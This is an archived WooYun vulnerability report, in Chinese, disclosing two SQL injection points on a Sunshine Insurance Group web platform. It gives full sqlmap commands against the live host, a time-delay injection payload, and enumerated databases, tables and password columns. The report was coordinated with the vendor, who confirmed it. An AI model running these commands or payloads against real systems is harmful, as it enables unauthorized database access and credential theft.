乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-20: 细节已通知厂商并且等待厂商处理中 2015-08-20: 厂商已经确认,细节仅向厂商公开 2015-08-30: 细节向核心白帽子及相关领域专家公开 2015-09-09: 细节向普通白帽子公开 2015-09-19: 细节向实习白帽子公开 2015-10-04: 细节向公众公开
如题
阳光保险集团云平台两处前台sql注入1.注入点1:登录处:
c:\Python27\sqlmap>sqlmap.py -u "http://ygjrex.sinosig.com/tabid/161/Default.aspx?returnurl=%2fdefault.aspx" --data="u_al=login&u_n=admin&u_p=admin123&u_r=0&_=0.33639599406160414" -p u_n
u_n参数存在延时注入
POST parameter 'u_n' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection points with a total of 88 HTTP(s) requests:---Parameter: u_n (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: u_al=login&u_n=admin';WAITFOR DELAY '0:0:5'--&u_p=admin123&u_r=0&_=0.33639599406160414---
2.注入点2:找回密码处
sqlmap.py -u "http://ygjrex.sinosig.com/http://ygjrex.sinosig.com/tabid/193/Default.aspx" --data="actionType=ecode&[email protected]&surl=http://ygjrex.sinosig.com/?TabId=193" -p email
报错注入,可以快速提取数据
使用注入点2获取的少量信息:数据库:
available databases [22]:[*] fcdb[*] km15b[*] km_14[*] km_15[*] km_bjh[*] km_gdym[*] km_lhsz[*] master[*] meisizixun[*] model[*] msdb[*] pfps[*] pfps_cuspro[*] pfps_customer[*] pfps_plan[*] pfpsata[*] pfpsproduct[*] tempdb[*] water_crm[*] waterh2_py[*] ygbx[*] zhongmeizhihui
表:
[221 tables]+---------------------------------------------+| Affiliates || AnonymousUsers || BRCB_APPDeviceInfo || BRCB_AccessroyPath || BRCB_Answer || BRCB_Attach || BRCB_Buffet || BRCB_CCUserInfo || BRCB_Category || BRCB_ClassInfo || BRCB_Class_User_Record || BRCB_Collect || BRCB_Comment || BRCB_Course || BRCB_CourseBox || BRCB_CourseQuestionInstance || BRCB_CourseRecord || BRCB_Department || BRCB_Dictionary || BRCB_ErrorQuestion || BRCB_Integral || BRCB_Log || BRCB_MobilePush || BRCB_MobileSuggest || BRCB_MobileVersion || BRCB_NewsMessage || BRCB_NewsMessageRecord || BRCB_Notice || BRCB_NoticeInfo || BRCB_NoticePush || BRCB_OrgPosition || BRCB_Organization || BRCB_Paper || BRCB_PaperInstance || BRCB_PaperInstance_Lastest || BRCB_PayRecord || BRCB_Question || BRCB_QuestionInstance || BRCB_Questionnaire || BRCB_QuestionnaireAnswer || BRCB_QuestionnaireQuestion || BRCB_QuestionnaireRecord || BRCB_R_Admin_User || BRCB_R_Attach_CCUserInfo || BRCB_R_Class_CourseBox || BRCB_R_Class_Paper || BRCB_R_Class_User || BRCB_R_Course_CourseBox || BRCB_R_Course_Question || BRCB_R_Course_User || BRCB_R_OrgPosition_CourseBox || BRCB_R_OrgPosition_Paper || BRCB_R_Paper_Question || BRCB_R_Paper_User || BRCB_R_UserGroup_CourseBox || BRCB_R_UserGroup_Paper || BRCB_R_User_CourseRating || BRCB_R_User_Group || BRCB_R_User_Questionnaire || BRCB_R_User_Region || BRCB_ShieldWords || BRCB_SystemAdmin || BRCB_SystemSetting || BRCB_User || BRCB_UserGroup || BRCB_UserMap || BRCB_VerifyCode || Banners || C_InfoCategory || C_InfoExtFiled || C_InfoExtValue || C_InfoItemRole || C_InfoModuleInfos || C_InfoPage || C_InfoSpec || C_InfoSpecInfo || C_InfoVersions || C_info || C_infoKeyword || C_infoLink || C_infoRemark || Classification || Client_View_BRCB_User_CourseBox_Course || Client_View_BRCB_User_TestPaper || DesktopModules || EventLog || EventLogConfig || EventLogTypes || Files || FolderPermission || Folders || HostSettings || HtmlText || Lists || ModuleControls || ModuleDefinitions || ModulePermission || ModuleSettings || Modules || MyDesktopLayout || Permission || PortalAlias || PortalDesktopModules || Portals || Profile || ProfilePropertyDefinition || RoleGroups || Roles || Schedule || ScheduleHistory || ScheduleItemSettings || SearchCommonWords || SearchIndexer || SearchItem || SearchItemWord || SearchItemWordPosition || SearchWord || SiteLog || Skins || SysDictionary || SystemMessages || TabModuleSettings || TabModules || TabPermission || Tabs || UManage_FavoriteCategory || UManage_MyFavorites || UrlLog || UrlTracking || Urls || UserPortals || UserProfile || UserRoles || Users || UsersOnline || VendorClassification || Vendors || Version || View_BECB_Questiong_ON_Category_PaperCount || View_BECB_R_Course_CourseBoxAndBRCB_Course || View_BRCB_Category_Statistics || View_BRCB_CourseAndBRCB_Category || View_BRCB_CourseBoxAndBRCB_Category || View_BRCB_CourseBox_Integration || View_BRCB_CourseKekan || View_BRCB_Department || View_BRCB_IntegralMore || View_BRCB_Organization || View_BRCB_PaperZhengchang || View_BRCB_Paper_ON_Category || View_BRCB_Paper_User_Assign_Record || View_BRCB_Question_ON_Category || View_BRCB_Question_ON_Paper || View_BRCB_R_Attach_CCUserInfo || View_BRCB_R_Course_QuestionAndBRCB_Question || View_BRCB_R_Course_UserAndBRCB_User || View_BRCB_R_OrgPosition_CourseBox || View_BRCB_R_OrgPosition_Paper || View_BRCB_R_UserGroup_CourseBox || View_BRCB_R_UserGroup_Paper || View_BRCB_R_User_Group || View_BRCB_StatisticsOrgCategoryCourse || View_BRCB_StatisticsOrgCategoryPaper || View_BRCB_StatisticsOrgCourse || View_BRCB_StatisticsOrgCourseCategoryRecord || View_BRCB_StatisticsOrgUserPaper || View_BRCB_StatisticsOrgUserRecord || View_BRCB_StatisticsUser || View_BRCB_Universal || View_BRCB_User || View_Category_CourseCount || View_Category_Indxe_StudyInfo || View_Collect_CourseBox || View_CourseBox_Distribution_Record || View_CourseRecord_LastTime || View_CourseSigned || View_NewMessage_Comment_Readed || View_NoticeInfo || View_Notice_And_Paperinstance_Coures || View_PaperListByQuestionId || View_Paper_R_User || View_TestCount || View_TopTenCourse || View_UserNewInfo || View_UserStatistics || View_User_R_Paper || WorkflowDef || aspnet_Applications || aspnet_Membership || aspnet_Profile || aspnet_Roles || aspnet_SchemaVersions || aspnet_Users || aspnet_UsersInRoles || provicetemp || sysdiagrams || tbl_province || vw_Client_CourseList || vw_Client_PackageList || vw_Client_UserPackageList || vw_CourseRecord || vw_FolderPermissions || vw_Lists || vw_ModulePermissions || vw_Modules || vw_Portals || vw_TabPermissions || vw_Tabs || vw_UManageFavorites || vw_UManageMyPublishArticles || vw_UManagePassedArticles || vw_UManageWaitAuditArticles || vw_Users || vw_aspnet_Applications || vw_aspnet_MembershipUsers || vw_aspnet_Profiles || vw_aspnet_Roles || vw_aspnet_Users || vw_aspnet_UsersInRoles || wfActive || wfTrace |+---------------------------------------------+
查询出含有password列的表
Table: BRCB_UserMap[1 column]+----------+----------+| Column | Type |+----------+----------+| PassWord | nvarchar |+----------+----------+Database: ygbxTable: vw_Users[1 column]+----------------+------+| Column | Type |+----------------+------+| UpdatePassword | bit |+----------------+------+Database: ygbxTable: aspnet_Membership[10 columns]+----------------------------------------+----------+| Column | Type |+----------------------------------------+----------+| FailedPasswordAnswerAttemptCount | int || FailedPasswordAnswerAttemptWindowStart | datetime || FailedPasswordAttemptCount | int || FailedPasswordAttemptWindowStart | datetime || LastPasswordChangedDate | datetime || Password | nvarchar || PasswordAnswer | nvarchar || PasswordFormat | int || PasswordQuestion | nvarchar || PasswordSalt | nvarchar |+----------------------------------------+----------+Database: ygbxTable: vw_Portals[1 column]+-------------------+----------+| Column | Type |+-------------------+----------+| ProcessorPassword | nvarchar |+-------------------+----------+Database: ygbxTable: Portals[1 column]+-------------------+----------+| Column | Type |+-------------------+----------+| ProcessorPassword | nvarchar |+-------------------+----------+Database: ygbxTable: vw_aspnet_MembershipUsers[8 columns]+----------------------------------------+----------+| Column | Type |+----------------------------------------+----------+| FailedPasswordAnswerAttemptCount | int || FailedPasswordAnswerAttemptWindowStart | datetime || FailedPasswordAttemptCount | int || FailedPasswordAttemptWindowStart | datetime || LastPasswordChangedDate | datetime || PasswordAnswer | nvarchar || PasswordFormat | int || PasswordQuestion | nvarchar |+----------------------------------------+----------+Database: ygbxTable: Users[1 column]+----------------+------+| Column | Type |+----------------+------+| UpdatePassword | bit |+----------------+------+
数据没拖,自行修复
危害等级:中
漏洞Rank:5
确认时间:2015-08-20 10:11
感谢提交,此站点未在公司机房,应该为分支部门自行搭建的应用,正在联系负责人
暂无